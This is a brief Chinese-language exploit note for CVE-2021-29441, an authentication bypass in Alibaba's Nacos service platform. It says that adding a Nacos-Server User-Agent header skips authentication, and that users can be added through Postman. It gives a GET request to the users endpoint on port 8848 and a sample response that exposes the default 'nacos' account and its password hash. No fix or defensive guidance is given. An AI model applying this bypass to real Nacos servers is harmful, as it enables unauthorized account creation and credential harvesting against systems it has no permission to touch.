CVE-2021-29441
这个漏洞是Nacos的,通过使用postman,直接访问接口:
就可以直接添加nacos的用户
Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。攻击者通过添加Nacos-Server的User-Agent头部将可绕过(nacos.core.auth.enabled=true)鉴权认证,从而进行API操作。
直接get方法访问这个地址:
'http://your_ip:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'
直接会显示出用户名密码
{"totalCount": 1,"pageNumber": 1,"pagesAvailable": 1,"pageItems": [{"username": "nacos","password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]
}